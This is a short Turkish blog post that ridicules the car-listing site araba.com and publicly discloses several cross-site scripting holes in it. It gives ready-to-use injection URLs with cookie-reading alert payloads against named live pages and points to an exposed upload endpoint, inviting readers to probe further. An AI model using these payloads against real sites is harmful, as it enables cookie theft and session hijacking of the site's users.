Araba.com ‘u duymayınınız yoktur herhalde. Saçma sapan seo yapısını google sevmiş olacak ki, gösterim sayısı sahibinden.com’un üzerinde görünüyor.  2011′in sonlarına gelirken, gösterim sayısı oldukça fazla olan jenerik bir adresin nasıl mundar edildiğini de görmemek mümkün değil. Nedir ne değildir bir bakayım dedim ve oldukça fazla XSS açığına rastladım. Bu post’umu araba.com sahipleri görür mü görmez mi bilemem, fakat şuanda şu halleriyle, kurumsal anlamda 5 kuruş etmediklerini bilmelerini çok isterim.  Ben yaklaşık 20-30 dk kadar baktığımda gördüklerimi belirteyim, gerisi siz deşeleyin..

mail.araba.com sunucu üzerindeki XSS açığı :
chapter parametresinden sonra verdiğiniz kodu iframe kodu içerisine işlemekte. kaynak kodundan ne yaptığınızı görebilirsiniz.

http://mail.araba.com/hilfe.php?chapter=%22+onload=%22alert%28document.cookie%29;

 

http://www.araba.com/galerici_ara.html üzerindeki bug;
Yukarıdakinin aynısından.
http://www.araba.com/galerici_ara.html?keyword=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

araba.com multfileupload;

İlanınıza fotoğraf eklerken kullandıkları multiuploader’a aittir.
http://login.araba.com/ajax/ElementITMultiPowUpload2.swf?uploadUrl=/ajax/pictures_upload.php
Araba.com’a üye olduktan sonra, içeride benzer durumlarla fazlasıyla karşılaşabilirsiniz. PHP kodu çalıştıran form alanları mevcut. O kadarını burada yayınlayarak zor durumda bırak istemiyorum.

Boş beleş işler aslında. Zamanı çarçur etmekten başka birşey değil. Fakat böylesine jenerik bir adresin, böyle kurumsalımsı adamların elinde olması ve mundar edilmesi rahatsız edici. Tasarımının da bir o kadar facia olduğunu söylemeye zaten lüzum yok. Yaşasın sahibinden.com.